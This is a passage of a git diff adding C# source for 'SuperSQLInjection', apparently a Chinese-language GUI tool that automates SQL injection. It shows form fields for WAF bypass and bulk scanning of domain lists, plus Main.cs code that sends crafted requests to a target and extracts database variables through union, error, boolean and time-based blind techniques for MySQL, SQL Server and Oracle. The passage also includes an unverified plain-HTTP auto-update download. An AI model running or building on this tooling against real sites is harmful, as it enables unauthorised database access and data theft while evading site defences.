System.Windows.Forms.ToolStripStatusLabel toolStripStatusLabel7; + private System.Windows.Forms.ToolStripStatusLabel status_lbl_runStatus; + private System.Windows.Forms.CheckBox cmd_chk_showCmdResult; + private System.Windows.Forms.TabPage tab_bypass; + private System.Windows.Forms.ContextMenuStrip bypass_lvw_replaceString_cms; + private System.Windows.Forms.ToolStripMenuItem bypass_delselect; + private System.Windows.Forms.Button injectConfig_btn_checkKey; + private System.Windows.Forms.ColumnHeader log_col_sleepTime; + private System.Windows.Forms.TextBox encode_txt_result; + private System.Windows.Forms.TextBox 
encode_txt_input; + private System.Windows.Forms.ComboBox encode_cbox_decode; + private System.Windows.Forms.ComboBox encode_cbox_encode; + private System.Windows.Forms.TabPage tab_scanInjection; + private System.Windows.Forms.Button inject_btn_autoFindKey; + private System.Windows.Forms.Button scanInjection_btn_spider; + private System.Windows.Forms.Label label20; + private System.Windows.Forms.TextBox scanInjection_txt_domainsPath; + private System.Windows.Forms.Button scanInjection_importDomains; + private System.Windows.Forms.ListView scanInjection_lvw_result; + private System.Windows.Forms.ColumnHeader col_index; + private System.Windows.Forms.ColumnHeader col_injectionType; + private System.Windows.Forms.ColumnHeader col_param; + private System.Windows.Forms.ColumnHeader col_testURL; + private System.Windows.Forms.Label scanInjection_domainsCount; + private System.Windows.Forms.Label label22; + private System.Windows.Forms.Label scanInjection_scanedURLSCount; + private System.Windows.Forms.Label scanInjection_findURLSCount; + private System.Windows.Forms.Label label30; + private System.Windows.Forms.Label label26; + private System.Windows.Forms.Label scanInjection_scanedDomainCount; + private System.Windows.Forms.Label label25; + private System.Windows.Forms.Timer timer_scanInjection; + private System.Windows.Forms.ContextMenuStrip scanInjection_cms; + private System.Windows.Forms.ToolStripMenuItem scanInjection_cms_exportResult; + private System.Windows.Forms.ToolStripMenuItem scanInjection_cms_copyURL; + private System.Windows.Forms.ColumnHeader col_mark; + private System.Windows.Forms.ToolStripMenuItem scanInjection_cms_clearResult; + private System.Windows.Forms.ToolStripMenuItem scanInjection_cms_delThisLine; + private System.Windows.Forms.SplitContainer splitContainer2; + private System.Windows.Forms.ListBox scanInject_lsb_links; + private System.Windows.Forms.CheckBox scanInect_chk_isSpider; + private System.Windows.Forms.CheckBox 
scanInect_chk_scanError; + private System.Windows.Forms.GroupBox groupBox11; + private System.Windows.Forms.GroupBox groupBox10; + private System.Windows.Forms.Label label23; + private System.Windows.Forms.Label label21; + private System.Windows.Forms.GroupBox groupBox13; + private System.Windows.Forms.ToolStripMenuItem data_dbs_tsmi_addTableOrColumn; + private System.Windows.Forms.Button scanInjection_btn_scan; + private System.Windows.Forms.GroupBox groupBox14; + private System.Windows.Forms.GroupBox groupBox12; + private System.Windows.Forms.ContextMenuStrip scanInjectionURL_cms; + private System.Windows.Forms.ToolStripMenuItem tsmi_exportScanInjectionURL; + private System.Windows.Forms.ToolStripMenuItem tsmi_clearScanInjectionURL; + private System.Windows.Forms.GroupBox groupBox15; + private System.Windows.Forms.GroupBox groupBox16; + private System.Windows.Forms.ColumnHeader col_injectionDB; + private System.Windows.Forms.ToolStripStatusLabel toolStripStatusLabel8; + private System.Windows.Forms.ToolStripStatusLabel status_lbl_all_status; + private System.Windows.Forms.ComboBox cbox_file_readFileEncoding; + private System.Windows.Forms.Label label24; + private System.Windows.Forms.ToolStripMenuItem 版本ToolStripMenuItem; + private System.Windows.Forms.ToolStripMenuItem data_dbs_tsmi_saveDTCStruct; + private System.Windows.Forms.ToolStripMenuItem data_dbs_tsmi_loadDTCStruct; + private System.Windows.Forms.ToolStripMenuItem data_dbs_tsmi_clearDTCStruct; + private System.Windows.Forms.ComboBox cbox_inject_type; + private System.Windows.Forms.Label label27; + private System.Windows.Forms.ContextMenuStrip cms_dataPacks; + private System.Windows.Forms.ToolStripMenuItem tsmi_createGetTemplate; + private System.Windows.Forms.ToolStripMenuItem tsmi_createPOSTTemplate; + private System.Windows.Forms.ToolStripMenuItem tsmi_changeRequestMethod; + private System.Windows.Forms.ToolStripMenuItem tsmi_clearColumns; + private System.Windows.Forms.ToolStripMenuItem 
tsmi_bugReport; + private System.Windows.Forms.GroupBox groupBox9; + private System.Windows.Forms.ComboBox cob_keyRepalce; + private System.Windows.Forms.Label label10; + private System.Windows.Forms.CheckBox bypass_chk_base64; + private System.Windows.Forms.ComboBox bypass_cbox_randIPToHeader; + private System.Windows.Forms.Label label18; + private System.Windows.Forms.Label label17; + private System.Windows.Forms.ComboBox bypass_cbox_sendHTTPSleepTime; + private System.Windows.Forms.CheckBox bypass_chk_inculdeStr; + private System.Windows.Forms.Label label16; + private System.Windows.Forms.TextBox bypass_txt_replaceTo; + private System.Windows.Forms.TextBox bypass_txt_replace; + private System.Windows.Forms.ListView bypass_lvw_replaceString; + private System.Windows.Forms.ColumnHeader col_replace; + private System.Windows.Forms.ColumnHeader col_replaceTo; + private System.Windows.Forms.Button bypass_btn_addReplaceStr; + private System.Windows.Forms.Label label19; + private System.Windows.Forms.CheckBox chk_reaplaceBeforURLEncode; + private System.Windows.Forms.ToolStripStatusLabel lbl_packsCount; + private System.Windows.Forms.ToolStripStatusLabel toolStripStatusLabel11; + private System.Windows.Forms.ToolStripMenuItem tsmi_createPackByURL; + private System.Windows.Forms.ColumnHeader col_url; + private System.Windows.Forms.ToolStripMenuItem tsmi_openURL; + private System.Windows.Forms.ToolStripMenuItem tsmi_tsmi_opentestURL; + private System.Windows.Forms.ComboBox bypass_cbox_loadTemplate; + private System.Windows.Forms.Label label28; + private System.Windows.Forms.Button bypass_btn_saveTemplate; + private System.Windows.Forms.ComboBox cbox_base64Count; + private System.Windows.Forms.ToolStripMenuItem tsmi_tsmi_exortOldURL; + private System.Windows.Forms.ToolStripMenuItem tsmi_tsmi_exortTestURL; + private System.Windows.Forms.ComboBox cbox_bypass_urlencode_count; + } +} + 
diff --git a/SuperSQLInjection/Main.cs b/SuperSQLInjection/Main.cs
new file mode 100644
index 0000000..6a44632
--- /dev/null
+++ b/SuperSQLInjection/Main.cs
@@ -0,0 +1,7207 @@
+using System;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.Data;
+using System.Drawing;
+using System.Text;
+using System.Windows.Forms;
+using tools;
+using System.Threading;
+using SuperSQLInjection.tools;
+using model;
+using SuperSQLInjection.model;
+using SuperSQLInjection.payload;
+using System.Diagnostics;
+using System.Text.RegularExpressions;
+using System.IO;
+using System.Collections;
+using SuperSQLInjection.scan;
+using System.Web;
+using System.Net;
+
+namespace SuperSQLInjection
+{
+ public partial class Main : Form
+ {
+ public Main()
+ {
+ InitializeComponent();
+ Control.CheckForIllegalCrossThreadCalls = false;
+ }
+ public ShowResponse sr = null;
+ public Config config = new Config();//注入基础配置
+
+ public String curren_db = "";//当前数据库
+ public String curren_table = "";//当前表
+ public static int status = 0;
+
+ public int currentDbsCount = 0;
+ public int currentTableCount = 0;
+ public int currentDataCount = 0;
+ public int dbsCount = 0;
+ public int tableCount = 0;
+ public int dataCount = 0;
+ public int runTime = 0;
+ public const String setInjectStr = "#inject#";
+ public Dictionary serverinfo_list = new Dictionary();
+ public Hashtable replaceList = new Hashtable();
+ public HashSet scan_list = new HashSet();
+ public int loadListStatus = 0;//注入双击导入扫描URL
+
+ public static int comm_count = 0;//猜测的表数量
+
+ public static int comm_currentCount = 0;//猜测的数量
+
+ public int injectionURLCount = 0;//注入URL数
+
+ delegate void showLogDelegate(String log);
+
+ public void showLog(String log)
+ {
+ this.txt_log.AppendText(log + "\r\n");
+ }
+
+ public void sendRequestAndShowResponse()
+ {
+ if (this.sr != null)
+ {
+ this.sr.Close();
+ }
+
+ if (Thread.CurrentThread.Name == null)
+ {
+ Thread.CurrentThread.Name = "SendThread-";
+ }
+ ServerInfo server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, "", this.txt_inject_request.Text, config.timeOut, config.encoding, config.is_foward_302,config.redirectDoGet);
+ if (server.timeout)
+ {
+ MessageBox.Show("连接超时!");
+ }
+ else
+ {
+ ShowResponse sr = new ShowResponse();
+ sr.server = server;
+ this.sr = sr;
+ sr.ShowDialog();
+ }
+
+ }
+
+ public void sendRequestAndShowResponseInvoke()
+ {
+ this.Invoke(new delegateVoid(sendRequestAndShowResponse));
+ }
+
+ delegate void delegateVoid();
+
+ private void btn_inject_sendData_Click(object sender, EventArgs e)
+ {
+ if (checkSendDataConfig())
+ {
+ Thread t = new Thread(sendRequestAndShowResponseInvoke);
+ t.Start();
+ }
+ }
+
+ private void Main_Shown(object sender, EventArgs e)
+ {
+ //初始化配置
+
+ this.cbox_basic_encoding.SelectedIndex = 0;
+ this.cbox_basic_threadSize.SelectedIndex = 9;
+ this.cbox_basic_timeOut.SelectedIndex = 4;
+ this.cbox_basic_reTryCount.SelectedIndex = 1;
+ this.data_dbs_cob_db_encoding.SelectedIndex = 0;
+ this.file_cbox_readWrite.SelectedIndex = 0;
+ this.bypass_cbox_sendHTTPSleepTime.SelectedIndex = 0;
+ this.cbox_bypass_urlencode_count.SelectedIndex = 0;
+
+ HTTP.main = this;
+ //清空日志
+ Thread t = new Thread(Tools.delHTTPLog);
+ t.Start();
+ try
+ {
+ this.config = XML.readConfig("lastConfig.xml");
+ reloadConfig(this.config);
+ }
+ catch (Exception ex)
+ {
+ Tools.SysLog("加载配置发生错误!" + ex.Message);
+ }
+ this.Invoke(new StringDelegate(log), "自动加载上次配置成功!");
+ InjectionTools.addErrorCode();
+ //读取模板
+ List templates=FileTool.readAllDic("/config/template/");
+ foreach (String templateName in templates)
+ {
+ this.bypass_cbox_loadTemplate.Items.Add(templateName);
+ }
+ if (config.isAutoCheckUpdate)
+ {
+ new Thread(checkUpdate).Start();
+ }
+
+ }
+ public void HttpDownloadFile(string url, string path)
+ {
+ // 设置参数
+ HttpWebRequest request = WebRequest.Create(url) as HttpWebRequest;
+
+ //发送请求并获取相应回应数据
+ HttpWebResponse response = request.GetResponse() as HttpWebResponse;
+ //直到request.GetResponse()程序才开始向目标网页发送Post请求
+ Stream responseStream = response.GetResponseStream();
+
+ //创建本地文件写入流
+ Stream stream = new FileStream(path, FileMode.Create);
+
+ byte[] bArr = new byte[1024];
+ int size = responseStream.Read(bArr, 0, (int)bArr.Length);
+ while (size > 0)
+ {
+ stream.Write(bArr, 0, size);
+ size = responseStream.Read(bArr, 0, (int)bArr.Length);
+ }
+ stream.Close();
+ responseStream.Close();
+ }
+
+ public static int version = 20160525;
+ public static String versionURL = "http://www.shack2.org/soft/SSuperSQLInjection/version.txt";
+ //检查更新
+ public void checkUpdate()
+ {
+ try
+ {
+ String[] result = HttpTools.getHtml(versionURL, 30).Split('-');
+ String versionText = result[0];
+ int cversion = int.Parse(result[1]);
+ String versionUpdateURL = result[2];
+ if (cversion > version)
+ {
+ DialogResult dr = MessageBox.Show("发现新版本:" + versionText + ",更新日期:" + cversion + ",立即更新吗?", "提示", MessageBoxButtons.OKCancel);
+
+ if (DialogResult.OK.Equals(dr))
+ {
+ try
+ {
+ int index = versionUpdateURL.LastIndexOf("/");
+ String filename = "update.rar";
+ if (index != -1){
+ filename = versionUpdateURL.Substring(index);
+ }
+ HttpDownloadFile(versionUpdateURL, AppDomain.CurrentDomain.BaseDirectory + filename);
+ MessageBox.Show("更新成功,请将解压后运行!");
+ }
+
+ catch (Exception other)
+ {
+ MessageBox.Show("更新失败,请访问官网更新!" + other.GetBaseException());
+ }
+ }
+ }
+ else
+ {
+
+ MessageBox.Show("自动检查更新,没有发现新版本!");
+ }
+ }
+ catch (Exception e)
+ {
+ MessageBox.Show("未发现新版本!");
+ }
+ }
+
+ /***
+ * 检查配置是否完整
+ *
+ * **/
+
+ public Boolean checkConfig()
+ {
+
+ if ("".Equals(this.txt_basic_host.Text))
+ {
+ MessageBox.Show("描述没有填写目标地址!");
+ return false;
+ }
+
+ config.domain = this.txt_basic_host.Text;
+
+ try
+ {
+ config.port = int.Parse(this.txt_basic_port.Text);
+ }
+ catch (Exception e)
+ {
+ MessageBox.Show("把目标端口写上吧!");
+
+ return false;
+ }
+
+ if (InjectType.UnKnow.Equals(config.injectType))
+ {
+ MessageBox.Show("注入类型还未设置,您可以人工设置或点击自动识别!");
+ return false;
+ }
+
+ switch (this.cbox_basic_injectType.SelectedIndex)
+ {
+ case 0:
+ config.injectType = InjectType.UnKnow;
+ break;
+ case 1:
+ config.injectType = InjectType.Bool;
+ break;
+ case 2:
+ config.injectType = InjectType.Error;
+ break;
+ case 3:
+ config.injectType = InjectType.Union;
+ break;
+ case 4:
+ config.injectType = InjectType.Sleep;
+ break;
+ }
+
+ if (DBType.UnKnow.Equals(config.dbType))
+ {
+ MessageBox.Show("数据库类型还未设置,您可以人工设置或点击自动识别!");
+ return false;
+ }
+
+ switch (this.cbox_basic_dbType.SelectedIndex)
+ {
+ case 0:
+ config.dbType = DBType.UnKnow;
+ break;
+ case 1:
+ config.dbType = DBType.Access;
+ break;
+ case 2:
+ config.dbType = DBType.MySQL5;
+ break;
+ case 3:
+ config.dbType = DBType.SQLServer;
+ break;
+ case 4:
+ config.dbType = DBType.Oracle;
+ break;
+ case 5:
+ config.dbType = DBType.MySQL4;
+ break;
+ }
+
+
+ try
+ {
+ config.timeOut = int.Parse(this.cbox_basic_timeOut.Text);
+ }
+ catch (Exception e)
+ {
+ MessageBox.Show("每次请求多少时间?没响应我就放弃啦!");
+ return false;
+ }
+
+
+ if ("".Equals(this.cbox_basic_encoding.Text))
+ {
+ MessageBox.Show("网页是啥编码呢?我不会去猜的,赶快告诉我!");
+ return false;
+ }
+ config.encoding = this.cbox_basic_encoding.Text;
+
+ try
+ {
+ config.threadSize = int.Parse(this.cbox_basic_threadSize.Text);
+ }
+ catch (Exception e)
+ {
+ MessageBox.Show("大侠,同时启动多少个线程呢!");
+ return false;
+ }
+
+ try
+ {
+ config.reTry = int.Parse(this.cbox_basic_reTryCount.Text);
+ }
+ catch (Exception e)
+ {
+ MessageBox.Show("失败了不能放弃,我能试几次?");
+ return false;
+ }
+
+ if (this.cbox_basic_injectType.SelectedIndex == 0 && this.txt_inject_key.Text == "")
+ {
+ MessageBox.Show("盲注需要设置关键字,这个关键字呢,就是正常时(and 1=1)存在的字符,而不正常时(and 1=2)不存在的字符!");
+ return false;
+ }
+
+ if (this.cbox_basic_injectType.SelectedIndex == 1 && (this.txt_inject_unionColumnsCount.Text.Length <= 0 || this.txt_inject_showColumn.Text.Length <= 0))
+ {
+ MessageBox.Show("Union注入需要设置查询总列数和数据显示列!");
+ return false;
+ }
+
+ config.key = this.txt_inject_key.Text;
+
+ if (this.txt_inject_request.Text == "")
+ {
+ MessageBox.Show("没有设置数据包!");
+ return false;
+ }
+
+ config.request = this.txt_inject_request.Text;
+ //设置线程池控制
+ ThreadPool.SetMinThreads(config.threadSize, config.threadSize);
+ MyThreadPool.maxThread = config.threadSize;
+ return true;
+
+ }
+
+ public Boolean checkSendDataConfig()
+ {
+ if ("".Equals(this.txt_inject_request.Text))
+ {
+ MessageBox.Show("没有数据包!");
+ return false;
+ }
+
+ if ("".Equals(this.txt_basic_host.Text))
+ {
+ MessageBox.Show("描述没有填写目标地址!");
+ return false;
+ }
+
+ config.domain = this.txt_basic_host.Text;
+
+ try
+ {
+ config.port = int.Parse(this.txt_basic_port.Text);
+ }
+ catch (Exception e)
+ {
+ MessageBox.Show("把目标端口写上吧!");
+ return false;
+ }
+
+ try
+ {
+ config.timeOut = int.Parse(this.cbox_basic_timeOut.Text);
+ }
+ catch (Exception e)
+ {
+ MessageBox.Show("每次请求多少时间?没响应我就放弃啦!");
+ return false;
+ }
+
+
+ if ("".Equals(this.cbox_basic_encoding.Text))
+ {
+ MessageBox.Show("网页是啥编码呢?我不会去猜的,赶快告诉我!");
+ return false;
+ }
+ config.encoding = this.cbox_basic_encoding.Text;
+
+ try
+ {
+ config.threadSize = int.Parse(this.cbox_basic_threadSize.Text);
+ }
+ catch (Exception e)
+ {
+ MessageBox.Show("每次请求多少时间?没响应我就放弃啦!");
+ return false;
+ }
+ config.is_foward_302 = this.chk_inject_foward_302.Checked;
+ return true;
+
+ }
+ public void getVariablesBySleep(DBType dbType)
+ {
+
+
+
+
+ }
+ ///
+ /// 获得union获得error注入的获得的数据内容
+ ///
+ ///
+ ///
+ public String getOneDataByUnionOrError(String opayload)
+ {
+
+ try
+ {
+ ServerInfo server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, opayload.ToString(), config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+
+ if (server.body != null && server.body.Length > 0)
+ {
+ //查找格式^^!col$$$col!^^
+ Match m = Regex.Match(server.body, "(?<=(\\^\\^\\!))[.\\s\\S]*?(?=(\\!\\^\\^))");
+ if (m.Success)
+ {
+ return m.Value;
+ }
+ }
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "发生异常:" + e.Message);
+
+ }
+ return "";
+ }
+
+
+
+ ///
+ /// 获得union error注入的获得的hex数据内容
+ ///
+ ///
+ ///
+ public String getOneHexDataByUnionOrError(String opayload)
+ {
+
+ try
+ {
+ ServerInfo server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, opayload.ToString(), config.request, config.timeOut, config.encoding, config.is_foward_302,config.redirectDoGet);
+
+ if (server.body != null && server.body.Length > 0)
+ {
+ //查找格式
+ Match m = Regex.Match(server.body, "(?<=(\\-\\-\\:))[.\\s\\S]*?(?=(\\:\\-\\-))");
+ if (m.Success)
+ {
+ return Tools.unHex(m.Value, config.db_encoding);
+ }
+ }
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "发生异常:" + e.Message);
+
+ }
+ return "";
+ }
+
+ public String getOneHexNoUnHexDataByUnionOrError(String opayload)
+ {
+
+ try
+ {
+ ServerInfo server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, opayload.ToString(), config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+
+ if (server.body != null && server.body.Length > 0)
+ {
+ //查找格式
+ Match m = Regex.Match(server.body, "(?<=(\\-\\-\\:))[.\\s\\S]*?(?=(\\:\\-\\-))");
+ if (m.Success)
+ {
+ return m.Value;
+ }
+ }
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "发生异常:" + e.Message);
+
+
} + return ""; + } + + + public void getVariablesByUnionByMySQL5(Object v) + { + if (status == 0) + { + + Thread.CurrentThread.Abort(); + } + String[] sv = v.ToString().Split(':'); + List column_list = new List(); + column_list.Add(sv[1]); + String columns = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, "1", column_list, null, null, -1); + String pay_load = MySQL5.union_value.Replace("{data}", columns); + String result = getOneDataByUnionOrError(pay_load); + this.Invoke(new setVariableDelegate(setVariable), sv[0], result); + } + + public void getVariablesByUnionBySQLServer(Object v) + { + + String[] sv = v.ToString().Split(':'); + String pay_load = MSSQL.getUnionDataValue(config.columnsCount, config.showColumn, 1, sv[1]); + String result = getOneDataByUnionOrError(pay_load); + this.Invoke(new setVariableDelegate(setVariable), sv[0], result); + } + + public void getVariablesByUnionByOracle(Object v) + { + + String[] sv = v.ToString().Split(':'); + String pay_load = Oracle.getUnionDataValue(config.columnsCount, config.showColumn, sv[1], "", "", ""); + String result = getOneDataByUnionOrError(pay_load); + this.Invoke(new setVariableDelegate(setVariable), sv[0], result); + } + + public void getVariablesByErrorByMySQL5(Object v) + { + String[] sv = v.ToString().Split(':'); + List column_list = new List(); + column_list.Add(sv[1]); + String columns = MySQL5.creatMySQLColumnsStrByError(column_list, null, null, -1); + String pay_load = MySQL5.error_value.Replace("{data}", columns); + String result = getOneDataByUnionOrError(pay_load); + this.Invoke(new setVariableDelegate(setVariable), sv[0], result); + + } + + public void getVariablesByErrorBySQLServer(Object v) + { + String[] sv = v.ToString().Split(':'); + List column_list = new List(); + column_list.Add(sv[1]); + String pay_load = MSSQL.error_value.Replace("{data}", sv[1]); + String result = getOneDataByUnionOrError(pay_load); + //错误显示会HTML编码,所以需要HTML解码 + result = 
HttpUtility.HtmlDecode(result); + this.Invoke(new setVariableDelegate(setVariable), sv[0], result); + + } + + public void getVariablesByErrorByOracle(Object v) + { + String[] sv = v.ToString().Split(':'); + List column_list = new List(); + column_list.Add(sv[1]); + String pay_load = Oracle.getErrorDataValue(sv[1], "", "", ""); + String result = getOneHexDataByUnionOrError(pay_load); + this.Invoke(new setVariableDelegate(setVariable), sv[0], result); + + } + + //立即结束线程池 + private void StopThread() + { + status = -1; + if (this.currentThread != null) + { + this.currentThread.Abort(); + } + status = 0; + } + + public void getVariablesByUnion(DBType dbType) + { + switch (dbType) + { + + case DBType.Access: + MessageBox.Show("报告大侠,Access数据库不支持此功能!"); + break; + case DBType.MySQL4: break; + case DBType.MySQL5: + this.dataCount = MySQL5.vers.Count; + if (MySQL5.vers != null && MySQL5.vers.Count > 0) + { + for (int j = 0; j < MySQL5.vers.Count; j++) + { + String v = MySQL5.vers[j]; + //获取对应环境变量值 + MyThreadPool.initThread(new ParameterizedThreadStart(getVariablesByUnionByMySQL5), v); + this.currentDataCount = j + 1; + } + + } + else + { + MessageBox.Show("没有读到相关数据库的环境变量文件,请检查配置文件:config/mysql5/vers.txt是否存在!"); + } + break; + case DBType.SQLServer: + this.dataCount = MSSQL.vers.Count; + if (MSSQL.vers != null && MSSQL.vers.Count > 0) + { + for (int j = 0; j < MSSQL.vers.Count; j++) + { + String v = MSSQL.vers[j]; + //获取对应环境变量值 + MyThreadPool.initThread(new ParameterizedThreadStart(getVariablesByUnionBySQLServer), v); + this.currentDataCount = j + 1; + } + } + else + { + MessageBox.Show("没有读到相关数据库的环境变量文件,请检查配置文件:config/sqlserver/vers.txt是否存在!"); + } + break; + case DBType.Oracle: + this.dataCount = Oracle.vers.Count; + if (Oracle.vers != null && Oracle.vers.Count > 0) + { + for (int j = 0; j < Oracle.vers.Count; j++) + { + String v = Oracle.vers[j]; + //获取对应环境变量值 + MyThreadPool.initThread(new ParameterizedThreadStart(getVariablesByUnionByOracle), v); + this.currentDataCount = 
j + 1; + } + } + else + { + MessageBox.Show("没有读到相关数据库的环境变量文件,请检查配置文件:config/sqlserver/vers.txt是否存在!"); + } + break; + } + + } + public void getVariablesByError(DBType dbType) + { + switch (dbType) + { + + case DBType.Access: + MessageBox.Show("抱歉,Access数据库不支持错误显示方式注入!"); + break; + + case DBType.MySQL4: + MessageBox.Show("抱歉,MySQL4以下版本不支持错误显示方式注入!"); + break; + case DBType.MySQL5: + this.dataCount = MySQL5.vers.Count; + if (MySQL5.vers != null && MySQL5.vers.Count > 0) + { + for (int j = 0; j < MySQL5.vers.Count; j++) + { + String v = MySQL5.vers[j]; + //获取对应环境变量值 + MyThreadPool.initThread(new ParameterizedThreadStart(getVariablesByErrorByMySQL5), v); + this.currentDataCount = j + 1; + } + } + else + { + MessageBox.Show("没有读到相关数据库的环境变量文件,请检查配置文件:config/mysql5/vers.txt是否存在!"); + } + break; + case DBType.SQLServer: + this.dataCount = MSSQL.vers.Count; + if (MSSQL.vers != null && MSSQL.vers.Count > 0) + { + for (int j = 0; j < MSSQL.vers.Count; j++) + { + String v = MSSQL.vers[j]; + //获取对应环境变量值 + MyThreadPool.initThread(new ParameterizedThreadStart(getVariablesByErrorBySQLServer), v); + this.currentDataCount = j + 1; + } + } + else + { + MessageBox.Show("没有读到相关数据库的环境变量文件,请检查配置文件:config/sqlserver/vers.txt是否存在!"); + } + break; + case DBType.Oracle: + this.dataCount = Oracle.vers.Count; + if (Oracle.vers != null && Oracle.vers.Count > 0) + { + for (int j = 0; j < Oracle.vers.Count; j++) + { + String v = Oracle.vers[j]; + //获取对应环境变量值 + MyThreadPool.initThread(new ParameterizedThreadStart(getVariablesByErrorByOracle), v); + this.currentDataCount = j + 1; + } + } + else + { + MessageBox.Show("没有读到相关数据库的环境变量文件,请检查配置文件:config/sqlserver/vers.txt是否存在!"); + } + break; + } + + } + + public void getVariablesByBool(DBType dbType) + { + + switch (dbType) + { + + case DBType.Access: + MessageBox.Show("报告大侠,Access数据库不支持此功能!"); + break; + case DBType.MySQL4: + + break; + case DBType.MySQL5: + this.dataCount = MySQL5.vers.Count; + if (MySQL5.vers != null && MySQL5.vers.Count > 0) + { + 
for (int j = 0; j < MySQL5.vers.Count; j++) + { + String v = MySQL5.vers[j]; + MyThreadPool.initThread(new ParameterizedThreadStart(getVariableByBoolByMySQL), v); + this.currentDataCount = j + 1; + } + } + else + { + MessageBox.Show("没有读到相关数据库的环境变量文件,请检查配置文件:config/mysql5/vers.txt是否存在!"); + } + break; + case DBType.SQLServer: + this.dataCount = MSSQL.vers.Count; + if (MSSQL.vers != null && MSSQL.vers.Count > 0) + { + for (int j = 0; j < MSSQL.vers.Count; j++) + { + String v = MSSQL.vers[j]; + //获取对应环境变量值 + MyThreadPool.initThread(new ParameterizedThreadStart(getVariableByBoolBySQLServer), v); + this.currentDataCount = j + 1; + } + } + else + { + MessageBox.Show("没有读到相关数据库的环境变量文件,请检查配置文件:config/sqlserver/vers.txt是否存在!"); + } + break; + case DBType.Oracle: + this.dataCount = Oracle.vers.Count; + if (Oracle.vers != null && Oracle.vers.Count > 0) + { + for (int j = 0; j < Oracle.vers.Count; j++) + { + String v = Oracle.vers[j]; + MyThreadPool.initThread(new ParameterizedThreadStart(getVariableByBoolByOracle), v); + this.currentDataCount = j + 1; + } + } + else + { + MessageBox.Show("没有读到相关数据库的环境变量文件,请检查配置文件:config/sqlserver/vers.txt是否存在!"); + } + + break; + } + } + + /** + 获取环境变量 + */ + public void getVers() + { + //获取环境变量 + this.data_lvw_ver.Items.Clear(); + //检查注入配置 + if (checkConfig()) + { + //判断是否标记注入点 + if (isSetInjectPoint()) + { + switch (config.injectType) + { + case InjectType.Bool: + getVariablesByBool(config.dbType); + break; + + case InjectType.Union: + getVariablesByUnion(config.dbType); + break; + case InjectType.Error: + getVariablesByError(config.dbType); + break; + case InjectType.Sleep: + getVariablesByBool(config.dbType); + break; + } + + } + + } + + } + public Thread currentThread = null; + private void data_cms_tsmi_getVariable_Click(object sender, EventArgs e) + { + if (MyThreadPool.GetAliveThreadsCount() == 0) + { + status = 1; + currentThread = new Thread(getVers); + currentThread.Start(); + } + else + { + + MessageBox.Show("还有线程未结束,请稍后..."); + 
} + } + + public delegate void setVariableDelegate(String name, String value); + public void setVariable(String name, String value) + { + ListViewItem lvi = new ListViewItem(name); + + lvi.SubItems.Add(value); + this.data_lvw_ver.Items.Add(lvi); + } + + /// + /// 获取环境变量mysql bool + /// + /// + public void getVariableByBoolByMySQL(Object vers) + { + /* + if (config.keyType.Equals(KeyType.Time)) { + getVariableByBoolByMySQLSleep(vers); + }*/ + try + { + String[] vs = vers.ToString().Split(':'); + + String payload_len = MySQL5.ver_length.Replace("{data}", vs[1]); + if (config.keyType.Equals(KeyType.Time)) + { + payload_len = MySQL5.getBoolCountBySleep(MySQL5.bool_length, config.maxTime).Replace("{data}", vs[1]); + } + + int len = getValueByStepUp(payload_len,0, 10); + this.Invoke(new StringDelegate(log), vs[0] + "长度为-----:" + len); + + String va_payload = MySQL5.ver_value.Replace("{data}", vs[1]); + if (config.keyType.Equals(KeyType.Time)) + { + va_payload = MySQL5.getBoolCountBySleep(MySQL5.bool_value, config.maxTime).Replace("{data}", vs[1]); + } + + String value = ""; + //获取值 + for (int i = 1; i <= len; i++) + { + /* + String plen = null; + //是否判断多字节字符 + Boolean pLen_isMax = false; + if ("1".Equals(vs[4])) + { + //开启多字节判断 + //转换对应值判断是否多字节字符 + plen = MySQL5.ver_length.Replace("data", MySQL5.mu_value.Replace("{data}", vs[1]).Replace("{index}", i + "")); + pLen_isMax = findKeyInBody(plen, 2); + } + + //取值payload,替换对应下标值 + String tmp_va_payload = va_payload.Replace("{index}", i + ""); + //多字节字符 + if (pLen_isMax) + { + //MySQL采用hex + int mu_payload_len = getValue(plen, 2, 8); + int m_index = 0; + String[] ver_tmp = new String[mu_payload_len]; + while (m_index < mu_payload_len) + { + //获取多字节 + int ascii = getValue(tmp_va_payload, 0, 128); + ver_tmp[m_index] = ((char)ascii).ToString(); + m_index++; + } + //设置值,这里由于是hex值,需要转换 + value += Tools.unHex(Tools.convertToString(ver_tmp), config.db_encoding); + } + //单字节字符 + else + { + int ascii = getValue(tmp_va_payload, 0, 255); 
+ value += ((char)ascii).ToString();
+ }*/
+ String tmp_va_payload = va_payload.Replace("{index}", i + "");
+ int ascii = getValue(tmp_va_payload, 0, 255);
+ value += ((char)ascii).ToString();
+ }
+ this.Invoke(new StringDelegate(log), vs[0] + "值为-----:" + value);
+ this.Invoke(new setVariableDelegate(setVariable), vs[0], value);
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+
+ }
+
+ public void getVariableByBoolByMySQLSleep(Object vers)
+ {
+ try
+ {
+ String[] vs = vers.ToString().Split(':');
+
+ String payload_len = MySQL5.getBoolCountBySleep(MySQL5.bool_length, config.maxTime).Replace("{data}", vs[1]);
+
+ int len = getValueByStepUp(payload_len, 0, 10);
+ this.Invoke(new StringDelegate(log), vs[0] + "长度为-----:" + len);
+ String va_payload = MySQL5.getBoolCountBySleep(MySQL5.bool_value, config.maxTime).Replace("{data}", vs[1]);
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ /*此处忽略有中文的情况,这样可以提高速度
+ String plen = null;
+ //是否判断多字节字符
+ Boolean pLen_isMax = false;
+ if ("1".Equals(vs[4]))
+ {
+ //开启多字节判断
+ //转换对应值判断是否多字节字符
+ plen = MySQL5.ver_length.Replace("data", MySQL5.mu_value.Replace("{data}", vs[1]).Replace("{index}", i + ""));
+ pLen_isMax = findKeyInBody(plen, 2);
